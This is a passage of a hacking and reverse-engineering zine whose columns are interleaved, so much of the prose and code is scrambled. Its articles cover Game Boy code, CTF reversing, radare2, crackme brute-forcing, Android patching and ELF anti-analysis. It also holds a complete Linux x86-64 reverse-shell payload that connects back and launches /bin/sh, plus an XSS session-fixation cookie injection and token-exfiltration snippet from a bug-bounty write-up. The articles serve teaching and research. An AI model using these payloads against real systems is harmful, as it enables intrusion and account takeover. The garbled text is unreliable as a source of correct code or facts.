left on VRAM by the boot rom. In our program we ld a,[hl] change the horizontal and vertical scroll for each ; scroll_x = LUT[idx] scan line of the LCD using a lookup table. For this, ldh [$43],a we only need a toolchain that outputs instructions ld a,l for the Sharp LR35902 CPU. RGBDS add a,$09 (https://rednex.github.io/rgbds/) will be our and $1F weapon of choice. It includes an assembler, linker ld l,a and rom header fixer. ld a,[hl] ; wobble.asm ; idx = (idx + 9) & 0x1F section "HEADER", ROM0[$0100] ; scroll_y = LUT[idx] nop ldh [$42],a jp wobble_main ldh a,[$44] ; The ROM header needed by ; Finally we check if we've ; the system to validate the rom. ; reached vblank to db $CE,$ED,$66,$66,$CC,$0D,$00,$0B ; break the loop cp $90 db $03,$73,$00,$83,$00,$0C,$00,$0D jr nz,.inner_loop db $00,$08,$11,$1F,$88,$89,$00,$0E ; Increment the LUT offset so db $DC,$CC,$6E,$E6,$DD,$DD,$D9,$99 db $BB,$BB,$67,$63,$6E,$0E,$EC,$CC ; we can have motion. inc e db $DD,$DC,$99,$9F,$BB,$B9,$33,$3E db "WOBBLE",$00 jr wobble_loop ; Entry point ; Lookup table of simple sine wave section "WOBBLE", ROM0[$0150] section "WOBBLE_DATA", ROM0[$2000] db $00,$00,$01,$01,$02,$02,$02,$02 wobble_main: ; E is our LUT offset db $02,$02,$02,$02,$01,$01,$00,$00 ld e,$00 db $00,$00,$FF,$FF,$FE,$FE,$FE,$FE ; Initialize H to the db $FE,$FE,$FE,$FE,$FF,$FF,$00,$00 ; MSB of WOBBLE_DATA For compiling this with RBGDS we use the ld h,$20 following commands: wobble_loop: ; B will be the scanline we rgbasm -o wobble.o wobble.asm rgblink -o wobble.gb wobble.o ; want to transform ld b,$00 rgbfix -v -p0 wobble.gb .inner_loop: Now that the rom is built we can run it on the BGB ; Load the current scanline emulator or a physical system. Sadly it won’t work ; position and compare it to B with a Game Boy Color because that system clears ldh a,[$44] the logo from VRAM after booting up. twitter.com/bitnenfer Felipe Alfonso 41 CC BY 4.0 HOW TO: unboringly tease GoogleCTF 2019 Reverse Engineering HOW TO: unboringly tease Google CTF 2019 HOW NOT TO: introduce into python 1 Introduction 3 Solution Last year’s Google CTF’s Beginners Quest1 did not I just tinkered a little bit inside the binary, closed introduce into reverse engineering very well. Unfor- the backdoor and let you peek into crucial changes tunately there were two RE-challenges and only one being made. You should be unable to simply reverse of them, called GATEKEPPER2 , with the potential the patch. I think it is still easy but hopefully not as to get you in touch with a disassembler. Most video quickly solvable as last time. Perhaps you will learn write-ups, I have seen 345, did not take a look into the at least something new from the modified challenge. assembly or the algorithm itself, because it was not necessary and they caught the password almost im- mediately. What a pity! How could this be and does 4 Task it give a good introduction into the topic of reverse The home owners put another cake in the fridge, not engineering? before fixing some issues and patching the software. Thanks to our surveillance team, we just intercepted some parts of the current patch. 2 Problem #! /us..bin/..thon Because the encoded password was stored within the f = open(’gatekeeper’, ’r+b’) binary, you got your attack vector. In my opinion, the f.s.ek(0xde0) chosen password was way too trivial and so the rever- f.wr..e(b’S..Wh..e’) sed leetspeak phrase zLl1ks d4m t0g I“ kind of aler- f.seek(0xe01) ” ted everybody. Not real reversing but literally simple f..rite(b’s..cr..E..1k..rc’) reversing was involved to get to the flag. There was a ..see..0xb29) big unused potential within this task. It was small and f.write.b.\x..’) commonly compiled code, to easily reverse and un- Good luck and lots of fun using your prefered disas- derstand the algorithm, instead of guessing the right sembler to reverse some x866 opcodes. Experienced answer. I heavily thought about how to use this good players must not use the given link and instead di- potential and gave it a try patching it. sassemble the binary stored in olly’s magical backup 1https://github.com/google/google-ctf/tree/master/ patterns. With pen and paper only, of course! ;P. So- 2018/beginners lutions you could mailto:[email protected]. Do 2https://github.com/google/google-ctf/blob/master/ you feel like playing more CTFs? Let’s meet June 22 2018/beginners/re-gatekeeper/attachments/gatekeeper at Google CTF 20197! 3https://www.youtube.com/watch?v=bshuAGkgY3M 4https://www.youtube.com/watch?v=qDYwcIf0LZw 6https://github.com/idandre/gatekeeper-2.git 5https://www.youtube.com/watch?v=WUOMnLWKFrc 7https://g.co/ctf ReverseiT https://youtube.com/channel/UCej7jrdKOsjTTi_GuaWFKcA SAA-ALL 0.0.5 42 Reverse Engineering HOW TO: easily get started with radare2 HOW TO: easily get started with HOW NOT TO: learn x86 assembly language Basic Concepts Binary Patching To open a file in write mode, type: The following command (p)rints a he(x)dump of size r2 -w file 0x8 at the address appended by @. Welcome to the r2 command line. To understand r2 :> px 0x8 @0xde0 better I will introduce some concepts first. r2 has 0xde0 306e 335f 5734 724d 0n3_W4rM a seeker which points to the virtual memory address How to (w)rite a (z)ero terminated string at address shown inside the square brackets. 0xde0? [0x00000b10]> :> wz SnwWh1te @0xde0 If you need some help use the command ?. Just push [A] in visual mode to (w)rite some (a)ssembler, or use the command line with key [:]. [0x00000b10]> ? ... | s[?] [addr] seek to address ... :> wa mov edi, 0 @0xa24 Do you need some more help with a specific command? Just append ? to it. Debugging [0x00000b10]> s? For debugging a file in r2, you need to use option -d. ... | s Print current address ... r2 -d file Unlike most OS terminals, the command names are ex- tremely puritanical and most of them are abbreviations To add a (d)ebug (b)reakpoint at the address sym.main of the actions you would like to perform. So do not be plus offset 0x1a0 just type: surprised about commands like: db sym.main+0x1a0 [0x00000b10]> wtf! aF1L3 In visual mode, you simply push [s] to move the CPU Evil to him who evil thinks, because it just (w)rites (t)o register RIP one (d)ebug (s)tep forward. Or you can the (f)ile aF1L3 from current address 0xb10 to the end assing a new value to the (d)ebugged (r)egister RAX: of the mapped memory. This greatly speeds up the ds; dr rax = 0x12345678 analysis process, but on the other hand, it takes a lot of time to learn it and even more to master. Misc Visual Mode There is one more thing worth mentioning. After I started working with r2, I always opened a python con- You can switch to visual mode with the command V and sole for calculations. At that time I did not know that come back to the command line mode by pushing [q]. there was a much more elegant and easy way. In visual mode, you can scroll up and down in a vim-like :> ?v 0xdead0000 + 0x0000beef fashion with [j] and [k], as well as enter the command 0xdeadbeef line by pushing key [:]. While moving up and down, Are you tired and have enough for today? So let’s (q)uit the seeker is updated to the very top memory address 1 shown. There are five different print modes which can and take a rest. To see radare2 in action, you might be interested in watching a more comprehensive youtube be changed by [p] and [P]. Most of the time reversing 2 code, I work in the third, the debugger mode. To auto- tutorial . matically analyse the main function push [:], then type the command af@main. Now push [V] to switch to the interactive Ascii Art graph which displays a flowchart of the analysed function. Move around with [h][j][k][l]. Zoom in with [+], zoom out with [-] and zoom to 100% with [0]. If you would like to get some help, just push [?] as usual. Rotate through five different modes with [p] and [P]. To highlight text, use [/] and type in the text 1https://www.radare.org you want to be shown highlighted. 2https://www.youtube.com/watch?v=hufgzz8nwNw https://youtube.com/channel/UCej7jrdKOsjTTi_GuaWFKcA ReverseiT 43 SAA-ALL 0.0.5 Crackme Solving for the Lazies Reverse Engineering instructions: simple crackmes will often bail out as soon as possible when checking their input. For Crackme Solving for example, when naively comparing two strings, they will stop at the first differing character. So the more characters we’re able to guess, the more the Lazies Because nobody has time to waste on petty instructions will be executed crackmes during CTF, here are two simple side-channels-based tricks to quickly solve the This approach has the nice side effect (pun boring ones: The first is for when you know what intended) of guessing the flag character by part of the code is used to display the flag, while the character, like in the movies! second is for things that you don’t even want to look at. On Linux, measuring all sorts of low-level metrics can be done via the performance counters Coverage-guided solving infrastructure, exposed to userland via the perf toolsuite. This can easily be wrapped in some Open the binary in your favorite hex editor, which Python, as in the script below, to provide a should of course be radare2, and patch the simple-yet-effective bruteforcer. An important instructions that are displaying the flag with xor detail to consider is the -r parameter, controlling eax,eax;moveax,[eax]; essentially a NULL how many times the binary is run before taking the pointer dereference leading to a crash. The final mean value. Without setting it to a “large” (~10) step is to throw the modified binary at a value, other processes’ noise will likely skew our coverage-guided fuzzer like AFL, and to wait for it to measurements. trigger a crash: the corresponding input is usually the flag you’re looking for. Moreover, should a given metric, like the number of executed instructions, not yield the flag, it might be Performance-guided solving worth trying different ones, like number of executed branch instructions, cache-misses of various levels, The second trick is a bit similar, but instead of trying cpu-cycles, memory-accesses, number of to maximize the coverage to eventually find the flag, speculatively executed branches, side channels … we’re aiming at maximizing the number of executed are everywhere, you just have to find them! #!/usr/bin/env python3 import string, shlex, sys from subprocess import Popen, PIPE cmd = 'perf stat -r 25 -x, -e instructions:u %s ' % sys.argv[1] key = '' while True: maximum = 0,0 for i in string.printable: c = cmd + shlex.quote(key+i) + ' >/dev/null' _, stdout = Popen(c, stderr=PIPE, shell=True).communicate() nb_instructions = int(stdout.decode('utf-8').split(',')[0]) if nb_instructions > maximum[0]: maximum = nb_instructions, i key += maximum[1] print(key) Julien Voisin dustri.org CC BY-SA 4.0 44 Reverse Engineering Android Reverse Engineering example, you want to find the web API? Simply Android Reverse search for “http”. You want to find the app settings? Search for “SharedPreferences”. You want to find a special functionality? Just google Engineering! how you would implement it and then search for Have you ever wondered why there’s so many the class. Most of the times, you won’t even need cracked apps out there? Well, because Android to google it, because you can easily guess it. Reversing is simple. OK, it’s not that simple, but Editing most of the developers don’t care and thus make Once you found the variable or function you can the job of reverse engineers easier, because they simply go to the smali1 files and patch it. To do don’t add any protection. You can argue, that the that you need to find the path where it's stored. In more popular the app is, the better protected it is. Java there are packages, which are the equivalent Keep that in your mind, when picking your target. to folders. If you scroll to the top in jdgui you First of all, you’ll need some tools, because you should find the package name. After that, simply certainly don’t want to do everything from scratch. replace the placeholders and go to the resulting These are the tools we will be using throughout path. the article: - jdgui Packing - bytecodeviewer Reverse engineering and patching an app is cool, but how can we actually install it? Generating a .jar Building the apk Generally, the first thing you would do, is generate To build the decompiled files, you can run this a .jar, which is just a simple .zip file. Decompiling command. The built apk will be located that by hand would be hard because it contains at 1 Assembly Language used by Android Github: github.com/not-matthias not-matthias Twitter: twitter.com/not_matthias 45 Blog: not-matthias.github.io CC0 anti-RE for fun Reverse Engineering --=[anti-RE forfun]=-- and the pointer to the string table so that we can loop through the sections until we find the .whatever section. Elf64_Shdr * searchsec(char * section_name, void * d){ In this article, we will go through a couple of techniques to guide the reader towards a path to protect their code. One Elf64_Ehdr * elf_header = ( Elf64_Ehdr * ) d; Elf64_Shdr * s_header=(Elf64_Shdr *)(d + elf_header->e_shoff); of the methods is to obfuscate the code so much that an Elf64_Shdr * shstrtab = &s_header[elf_header->e_shstrndx]; attacker gets confused while trying to reverse engineer const char * const strtabptr = d + shstrtab->sh_offset; the binary. In order to correctly obfuscate an ELF binary, char * name; we need to understand how an attacker does the analysis for (int i = 0; i < elf_header->e_shnum; i++){ of a binary. Basically, there are two methods of doing it, name = (char*) (shstrtab + s_header[i].sh_name); one is Static Analysis which is done without running the if (strcmp(name, section_name)==0) return &s_header[i]; binary, just by looking at the disassembly and trying to } figure out what the binary does. The other method is return NULL; Dynamic Analysis in which an attacker runs the binary and } traces the execution of the process to figure out what the The function searchsec() will look like this. binary is doing. While testing several crypters we found out they Static analysis can be made harder by encrypting all the implemented almost the same thing. See also: strings used inside a binary and also loading the libraries POCRYPT : https://github.com/picoflamingo/pocrypt dynamically by using dlopen() and dlsym() function calls ELFCRYPT : https://github.com/droberson/ELFcrypt so that the attacker cannot guess the functionality based on the PLT table and strings embedded inside the binary. Dynamic Analysis of a binary can also be made harder by One can also use unnecessary jump instructions by using making the control flow obfuscated. A normal control goto statements and then add some bogus fake code flow consists of starting with the main() function, then in-between the jump statements to make the control flow branching out like a tree and eventually coming back to even more harder to digest. Another method is to encrypt the main() function, completing the execution. We can the binary and make it decrypt itself during runtime. To do make this control flow disorientating by repeatedly calling this we need to understand the ELF format. For example, a function again and again with different arguments and we have a license_check() function which we want to then jumping from the middle of one function to some hide, we will force this function to be in a different section other function, making the control flow insanely complex. than the usual .text, then we'll encrypt this new section. A One neat trick is shown by Sergey Bratus and Julian decrypting function also needs to be called before we run Bangert in the International Journal of PoC || GTFO 0x00 license_check() so that when it is actually called then the where they mutated a binary such that IDA showed a real decrypted code executes. Once we have both different code than the one which actually got executed. encrypting and decrypting functionality then we can do all This was because the tools followed the section table but sorts of crazy stuff during runtime. the kernel follows the program header table which can setup a completely different address space. This space Disassembly Of license_check() can then be used to execute completely different code. The General issue that arises with ELF is the difference in parsing the format, this is called a Parser Differential for ELF and it means that different programs parse the same input slightly differently. When the kernel loads the ELF binary, it doesn't use the ElfX_Shdr, it only needs the ElfX_Phdr to set up the VMAs. According to this, we can say that the following ElfX_Ehdr's fields are kinda useless: e_shoff, e_shentsize , e_shnum , e_shstrndx. So, if we remove them then the program should still work but debuggers will have a hard time dealing with the binary. #define ENC __attribute__((section(".whatever"))) While these techniques sometimes seem too hard to ENC int license_check(char *str){/* code here */}; crack, it’s actually just a matter of time until someone will figure out the protections and break them. Now, any function which is defined like above will be stored in the .whatever section. This section will only have More info : AX(alloc,execute) flags, but in the decrypt function, we need to write the decrypted code back to our custom http://phrack.org/issues/58/5.html section. For that, we need to change its permissions using http://shell-storm.org/blog/Linux-process-execution-and-the-usel mprotect(). We need the pointer to this section. To find its ess-ELF-header-fields/ address we need to find the pointer to the list of sections X3eRo0 and codacker Website : https://www.abs0lut3pwn4g3.cf Twitter : https://www.twitter.com/Abs0lut3Pwn4g3 WTFPL Linkedin : https://www.linkedin.com/company/abs0lut3pwn4g3 46 Reverse Engineering Reverse Engineering File Format From Scratch Reverse Engineering File Format From Scratch Ido Filus Usually file structures are vastly documented Noticing this I quickly forgot about researching the with open-source parsers available, but that's RIFF file and focused on building a parser for the not always the case. In this article we will take a XML (since it looked less scary than the binary data look at a case study of reverse engineering After in the original .aep files). Using the reference of the Effects' project file - this will serve a dual XML format I learned how single tags, children, purpose of demonstrating how we can attributes, arrays etc are represented. When understand the file structure of an building the parser I just made it parse recursively undocumented format and showing that it’s not until it hit a point it couldn't continue through. Then I as scary as one may think. Based on the determined the problem, fixed it, and iterated - and acquired knowledge we should be able to build a quite quickly my parser was able to finish parsing all file parser and extract information. the nodes and data in the file. The first thing I did was opening the file in a hex Since the parser could already understand some editor to get a general feeling for it, and I also run project properties described as XML tags, I the “file” tool to learn what I could about the file managed to extract the composition name (which is format. kind of a layers grouping in AE). From there I could work on understanding the meaning of certain tags and the data they contain - it seemed most of the data was found in the bdata attribute in a binary format. The easiest way to go about it was to start with an empty project to minimize the amount of data (and export it) and then add layers we know the meaning of, and do a diff between the old and new exports. Do note that it's also beneficial to use the same approach for multiple empty projects to understand In this example it was revealed to be a big-endian where variable data (such as timestamp/etc) is stored. RIFF file. While learning more about it I also wanted to better understand how these files are used inside AE. Since AE is a pretty huge I didn’t wanted to RE As for the binary data, we can try to parse it in the binaries just yet and hopefully to skip that different formats such as integers, floats or/and text overall. AE allows us to “Save As > Save a Copy As and see what makes the most sense. Once we focus on an area in the file, we should be able to XML” which caught my attention, since it meant the file structure can be represented in a more figure out the “effect” and “settings” of the layer it human-readable way. It also might have helped me affects. make heads or tails of the ASCII strings I saw in the hex editor - note the similarities between these two We can keep researching the differences and guessing the types until we're satisfied we know files - “swvap”, “head”, “nhed”, etc: enough. It’s important to also ask yourself how https://www.linkedin.com/in/ido-filus-6783b812b/ Ido Filus 47 SAA-TIP 0.0.5 Back to the BASICs Reverse Engineering The theme of Google CTF 2018 Qualification round of the list is pretty simple, it's equally simple to use was "history of hacking" - and what better way to SMC (Self-Modifying Code) techniques (i.e. POKE). celebrate it than to make a Commodore 64 For instance, the program can - at rest - consist of a reverse-engineering challenge [1] in pure BASIC? single line - at least as far as the LIST command is Actually, my original idea was to do a 6510 concerned. When executed, this line would change assembly challenge and so I spent a few of hours the next field of the next node from a NULL pointer watching Michal Taszycki's C64 assembly tutorial to a proper value, thus allowing the execution to series [2] that I bought some time ago. A couple of continue (the second line should probably "close episodes touched on the internals of C64 BASIC's the door", i.e. put the NULL pointer back in place; interpreter and, after I heard about the way the this will break backward jumps though). program was stored in-memory, a couple of ideas Actually, a more fun way to tackle the problem of sprang into my mind. "break+LIST disclosing the source code that we So BASIC it was. want to hide" is to make a node point back at itself - To cut to the chase (and get a bit more technical), a again, at runtime - using SMC: typical BASIC program looks like this: 10 PRINT "HI" 20 GOTO 10 And it's stored in memory (and in .prg format) as a single-linked list starting at address 0x801: Running the LIST command in such case yields interesting results: Each list node consists of a next pointer (2 bytes And last but not least, being able to use SMC means Little Endian), the line number (yes, that's what one's also able to encrypt (obfuscate) selected these prefix numbers are; also 2 bytes LE), and nodes, and decrypt (deobfuscate) them at runtime. then the null-terminated dictionary-compressed So, how do we do all of this using C64 BASIC line content (i.e. BASIC keywords are encoded as editor/interpreter? No idea. To create this 0x80+keyword_index, where the keyword_index is challenge, I had to write my own BASIC "compiler" taken from a dictionary hardcoded inside the – I called it CrackBASIC because it was made for the BASIC interpreter [3]). And the list is terminated sole purpose of creating this CrackMe (also, with an additional empty node consisting of only a because it's BASIC on crack). It has a couple of nice NULL pointer in the next field. features, like being able to calculate node It has to be noted that storing a program in a linked addresses of specific lines at compilation time or list of lines is pretty unusual for today's standards. encrypt selected parts of the code. You can check it On the flip side, imagine all the possibilities this out in the challenge's source directory. gives one to mess with players trying to reverse it! And that's it! I encourage you to try to solve the Let's start with the pretty simple and obvious fact challenge yourself - there are a few more surprises that line numbers don't really matter too much. there. True, both GOTO and GOSUB, and a few other commands use them, but apart from jump targets Gynvael Coldwind most lines can have identical line numbers. If one keeps them non-decreasing the program should [1] https://github.com/google/google-ctf/tree/master/ work just fine - not the case for BASIC's "editor", 2018/quals/re-basics but it's OK if we only care about running the code. [2] https://64bites.com/ Moving to more interesting things, since the format [3] https://www.c64-wiki.com/wiki/BASIC_token Gynvael Coldwind https://twitter.com/gynvael https://gynvael.coldwind.pl/ SAA-ALL 0.0.5 https://www.youtube.com/c/GynvaelEN/ 48 Reverse Engineering AndroidProjectCreator AndroidProjectCreator Analysing decompiled Android malware code is a tedious task. AndroidProjectCreator aims to improve the effectiveness of this analysis by providing you with an easy-to-use toolkit. So how does it work? AndroidProjectCreator is a command-line application that is written in Java and serves as a single interface for numerous tools that are used to decode and decompile an APK, such as dex2jar1 or JAD-X2. After decoding the resources and decompiling the code, an Android Studio project is created based on the newly obtained data. Why an Android Studio project? Existing open-source tools provide decompiled code, although there is a problem when one wants to remove or refactor code: more often than note, tools lack the support of this feature. Android Studio is always up-to- date, as it is used to create Android applications. This way, the power of the tool is leveraged for a (potentially) unintended purpose. A demo What better to show people than a wall of text? As is commonly said: “a picture is worth a thousand words”. This demo will serve as a picture. The used dependencies require the usage of the Java 8 JDK. Simply issuing the “-install” parameter to the JAR will start the installation. The installation will commence in the directory where the JAR resides, regardless of the terminal’s current working directory. After the installation is complete, the help menu is shown, together with the installation results. To decompile an application, simply call the JAR from anywhere on the machine and provide the required parameters: java -jar /path/to/AndroidProjectCreator.jar -decompile fernflower /samples/sms-stealer.apk ./sms-stealer-fernflower The “-decompile” argument specifies the mode in which AndroidProjectCreator needs to operate. The “fernflower” decompiler is chosen in this case. The APK to decompile is given after that. At last, the location where the Android Studio project needs to be placed is provided. When all is done, one can simply open Android Studio to analyse the code. For more information, one can visit the installation and usage guide here3. If you have any questions, please message me on Twitter: @LibraAnalysis4. 1 https://github.com/pxb1988/dex2jar 2 https://github.com/skylot/jadx 3 https://maxkersten.nl/projects/androidprojectcreator/ 4 https://twitter.com/LibraAnalysis @LibraAnalysis on Twitter Max 'Libra' Kersten 50 SAA-ALL 0.0.5 Reverse Shell With Auth For Linux64 Sec/Hack REVERSE SHELL WITH ; 1 - Create a socket push 0x29 ; socket syscall n° AUTH FOR LINUX64 pop rax This payload will connect back to a xor rdx, rdx ; zero out rdx remote location over TCP/IPv4 and launch push 0x02 ; 2 means IPv4 a shell only if a valid password is pop rdi provided. push 0x01 ; 1 means TCP pop rsi syscall mov r15, rax ; save socket in r15 ; 2 - Connect to the target mov rdi, rax mov rcx, _TARGET The process consists of 5 steps, each not rcx ; rcx=127.0.0.1:4444 one involving one system call: push rcx mov rsi, rsp 1 Create a new socket push 0x10 ; IPv4 address length 2 Connect to the target address pop rdx 3 Read 8 bytes and check if they match push 0x2a ; connect syscall n° pop rax the password syscall 4 Duplicate each standard stream (stdin, stdout and stderr) into the ; 3 - Read password from client socket, allowing the target to send read_pass: and receive messages xor rax, rax ; read syscall (0) 5 Execute a shell mov rdi, r15 ; rdi = socket fd push 0x08 pop rdx ; rdx = 8 (input size) "How do I make a syscall?" you may ask. sub rsp, rdx Place the syscall number into RAX mov rsi, rsp ; rsi -> buffer Parameters go into: syscall RDI,RSI,RDX,R10,R8,R9 and the stack ; Check password Use the syscall instruction and... mov rax, _PASS mov rdi, rsi Let the kernel do the magic! scasq ; compares rax vs rdi jne read_pass Configs for the payload: ; 4 - Duplicate streams 2,1 and 0 _TARGET: 0xfeffff80a3eefffd mov rdi, r15 ; rdi=socket fd push 0x02 ; 2 == stderr To get this number: pop rsi 1 IP to hex 127.0.0.1 -> 0x7f000001 loop_through_stdfds: 2 Port to hex 4444 -> 0x115c push 0x21 ; dup2 syscall n° 3 Constant for IPv4 IPv4 -> 0x0002 pop rax 4 Put it all together 0x0100007f5c110002 syscall (notice how IP and port endianness dec rsi ; next stream jns loop_through_stdfds change!) 5 Extra step: As the original value has ; 5 - Execve("/bin/sh") null bytes, it was replaced with its xor rdx, rdx one's complement. push rdx 0x0100007f5c110002->0xfeffff80a3eefffd ; echo -n '//bin/sh' | rev | xxd mov rbx, 0x68732f6e69622f2f push rbx _PASS: 0x214e49454d54454c mov rdi, rsp Hex little-endian for "LETMEIN!" push rdx (echo -n 'LETMEIN!' | rev | xxd) mov rdx, rsp push rdi The code provided favors readability instead of size mov rsi, rsp or speed. Many improvements can be done to it. push 0x3b ; execve syscall n° I leave that exercise to the reader. pop rax Happy hacking!! syscall Alan Vivona @syscall59 medium.syscall59.com SAA-ALL 0.0.5 51 Sec/Hack On escalating your bug bounty findings • Attacker forces the victim to log in to On escalating your https://www.shopify.com/admin/apps/flow, which redirects to vic- bug bounty findings tim.shopify.com/admin/apps/flow and then triggers the login flow; • Finally, the attacker can use the original session iden- Based on publicly-disclosed bug bounty reports, techni- tifier to authenticate as the victim. cal quirks, such as the ones listed in the HTTP cookies RFC1, are rarely being used to escalate popular attack Combining minor issues with an unauthenticated vectors like cross-site scripting (XSS). The lack of exploring reflected XSS to gain access to authenticated func- issues further could be a result of the competitiveness of tionality bug bounty programs, where bug bounty hunters attempt to submit reports immediately upon discovery of a poten- While collaborating with Alessandro De Micheli 3, a very tial problem. Another cause may be the lack of bug bounty basic unauthenticated reflected cross-site scripting flaw programs rewarding reporters based on the impact of the was discovered on a private program where based on past reported vulnerability. In this short paper, we want to experiences, the reporters knew this private bug bounty cover two noteworthy reports where we combined further program incorporate the impact into the bounty amount. issues to demonstrate the impact of the vulnerability. The To escalate the issue further and gain access to authenti- goal here is to encourage readers to toy around with their cated functionality, Alessandro and Edwin examined the findings and incorporate further minor issues into their main application looking for any minor flaws that could proof of concepts to illustrate the impact of their findings. be leveraged. This was when they stumbled across an endpoint with the following HTTP response (modified for Session fixation on Shopify enabling account brevity): takeover HTTP/1.1 200 OK As Shopify’s security policy states, cross-site scripting on Access-Control-Allow-Origin: * *.shopifycloud.com and *.shopifyapps.com is out of x-csrf-jwt: eyAAAAAAAAAA... scope because both of these hosts are littered with XSS. With a simple AJAX call, it was possible to retrieve the In other words, cross-site scripting on those hosts would x-csrf-jwt token. be considered an invalid finding2. Upon discovering an XSS flaw in Shopify’s SDK, Filedescriptor found that specific Shopify-built applications $.ajax({ used signed sessions or session identifiers. This discovery type: 'GET', led to Filedescriptor noticing that where session identifiers url:'https://example.com/endpoint', function were used, the applications were not generating fresh iden- success: (data, status, r){ tifiers on login. To put it another way, these applications alert(r.getResponseHeader('x-csrf-jwt')); were linking whatever session identifier was present in the }, function cookie header upon sign in with the authenticated user. error: (r, status, error){ This is known as Session Fixation and anybody that runs alert(r.getResponseHeader('x-csrf-jwt')); a bug bounty program has almost certainly seen this type } of behaviour reported as is without the reporter chaining }); the issue with other findings to demonstrate exploitability. Further, the settings panel of users’ on the target ap- As a result of this Session Fixation in certain appli- plication had a feature which allowed people to export cations belonging to Shopify, Filedescriptor was able to all their user data and history — similar to the “GDPR” leverage an XSS flaw in an out-of-scope asset to affect features you might see on Uber. By using the exfiltrated www.shopify.com itself. A hypothetical attack scenario x-csrf-jwt token, the fact that the login panel was frame- could take place as follows. able, the “GDPR” export function, and the XSS vulnera- bility, Alessandro and Edwin would have been able to leak • An adversary visits the application where they en- authenticated data from an unsuspecting user. countered the Session Fixation and takes note of the The fully-fledged exploit is too long to include in this session identifier the application assigns to them; paper, so a summary of the code is listed below. • The attacker uses the XSS on *.shopifycloud.com and sets a cookie on behalf of the victim, scoped to • Create iframe of login panel; x-csrf-jwt all of Shopify’s subdomains. • AJAX call to exfiltrate token and initiate download using token; document.cookie='_flow_session=EVIL;domain= • Wait for 200 OK status code from /export endpoint .shopifycloud.com;path=/'; and fetch exported ZIP from user’s /download end- point. 1https://tools.ietf.org/html/rfc2965 2https://hackerone.com/shopify 3https://hackerone.com/europa https://twitter.com/edoverflow Edwin "EdOverflow" Foudil https://twitter.com/filedescriptor and T.-C. "Filedescriptor" Hong 52 https://edoverflow.com/ CC BY 4.0 Fun with process descriptors Sec/Hack concept for processes called ”process descriptors”5 in Fun with process FreeBSD [2]. Instead of using a fork(2) syscall we can use a pdfork(2) syscall to spawn a new process. This descriptors syscall will return a handler called a process descrip- tor, which corresponds to the descriptor table - filedesc Besides the early version of MS-DOS (1.x-2.x), the structure in FreeBSD kernel. Process descriptors behave first versions of UNIX, Mac, and AmigaOS were de- like other descriptors (files, sockets, pipes etc), we can signed as multitasking operating systems [1]. The basic duplicate them (dup(2)), send them to other processes primitive which allows this design was a process. We (via UNIX domain sockets), and close them (close(2)). understand that a process is a program in execution. If there exists at least one process descriptor, the Processes are identified by unique numbers called PIDs. structures representing the process in kernel cannot be After 40 years, this fundamental abstraction is still used removed even if the process exited. Thanks to that we by all modern operating systems. can check the status of a process even after it has ex- The design of operating systems is constantly evolv- ited - solving the pkill(1) problem. Right now the only ing, and with time it turned out that the ordinary de- proper way to fetch the status of the process is through sign of processes has some downsides. First is the race using kqueue(2). The pdfork(2)’ed process will not send condition while we try to destroy (kill) a process. As SIGCHILDs to the parent process even if the parent pro- cess is wait(2)ing for all processes. When all of the pro- mentioned before, the process is identified by a single 6 number (PID). When we use pkill(1), we are providing a cess descriptors are closed, the process is terminated . name of the executable we want to kill. The application In the Linux world there have also been attempt to has to create a list of processes and their corresponding create process descriptors by adding an additional flag PIDs. pkill will send the signal (SIGTERM ) to destroy - CLONE FD - to the clone(2) syscall, which is used to the process to all PIDs matching the sought phrase. The spawn a new process in this kernel. The initial work was race condition occurs while we are going through the list started in 2015 by Josh Triplett, but never landed in the of executables. After we have created the list; the pro- Linux kernel [3]. Recently Linux developer introduced cess may disspear and the PID may be reused. In such a new flag - CLONE PIDFD - which allows that [4]. a situation, a signal will be sent to the recently created However, in v5.2 Linux kernel tag the only reliable way < > process, which may have a different name/executable. to access procfs process information (/proc/ pid / ) By default the maximum PID value is 32,768 on through PIDFD is to open the directory via process’ Linux1 and 99,999 on FreeBSD2. If this number is hit PID and validate if the process is still running by send- the counter starts using the lowest of the unused PIDs. ing a signal to it via PIDFD. There are some proposals In an environment with a lot of processes being spawned, to use pidfd open to simplify this process [5]. the probability of a short-term PID reuse is significant. The process descriptors give a reliable handle to the It is also worth mentioning that some configurations use process. Through introducing this concept, we enable randomised PIDs for discussable security benefit3. libraries to spawn new processes transparently to the application and prevent race conditions when signalling Another interesting problem with this design is that or managing the process In today’s world with high per- it’s not friendly for libraries. Right now if our library formance and short living processes it is unacceptable would like to create a new process, the application using to have an unreliable interface to handle processes. It it must be aware of such behavior. The point is, that if 4 would be interesting to see this concept incorporated the application uses the wait(2) syscall , it may receive more widely. the signal from a process created by the library. If a pro- gram is not prepared for that it can crash in unexpected References and random ways. [1] Michael Palmer, Michael Walters, Guide to Operat- An interesting question is: should libraries behave in ing Systems, Cengage Learning, 2011 such an ”unexpected” way and spawn new child pro- [2] Watson, R. N. M., Anderson, J., Laurie, B., and cesses? Is it a bad design? Not necessarily. If libraries Kennaway, K. Capsicum: practical capabilities for try to secure themselves through privilege separation or UNIX. 19th USENIX Security Symposium, 2010 using capabilities systems (like Capsicum) it can be use- [3] Jonathan Corbet, Attaching file de- ful. The same goes for optimisation. If libraries are try- scriptors to processes with CLONE FD, ing to use multithreading for optimising purposes should https://lwn.net/Articles/638613/, 2015 the main program be aware of that? [4] Christian Brauner, clone: add CLONE PIDFD, For those two reasons, in 2010 we developed a new https://lwn.net/Articles/786244/, 2019 [5] Christian Brauner, pidfd open(), 1It can be read from /proc/sys/kernel/pid max. It can be in- https://lwn.net/Articles/784222/, 2019 creased up to 222 on 64-bit Linux. 2It can be read and decreased using kern.max pid. 5It is worth noting that in the Linux kernel world the ”Process 3https://www.whitewinterwolf.com/posts/2015/05/23/ Descriptors” also refer to the task struct structure, which contains do-randomized-pids-bring-more-security/ all the information about the single process. Here we stick to the 4wait(2) and wait2(2) are used to wait for a status change of userland process descriptors. all child processes. The same goes for wait4(2) and waitpid(2) 6This behavior may be changed by passing PD DAEMON flag with -1 argument as wpid. to the pdfork(2) syscall. Mariusz "oshogbo" Zaborski http://oshogbo.vexillium.org/ SAA-TIP 0.0.5 53 Sec/Hack Windows EPROCESS Exploitation application, these flags could be modified for disabling Windows EPROCESS security protections from the application such as ACG, Exploitation CIG, CFG and others (2). Bruno Gonçalves de Oliveira (mphx2) lkd> dx -id 0,0,ffff8e8390eea580 -r1 While exploiting the Windows kernel, there are multiple (*((ntkrnlmp!_EPROCESS objects that an attacker can interact with to gain *)0xffff8e838cd22080)).MitigationFlagsValu privileges in userspace. Since the kernel is the base for es everything running in userland, all characteristics from not enough, for example, while escaping a sandbox 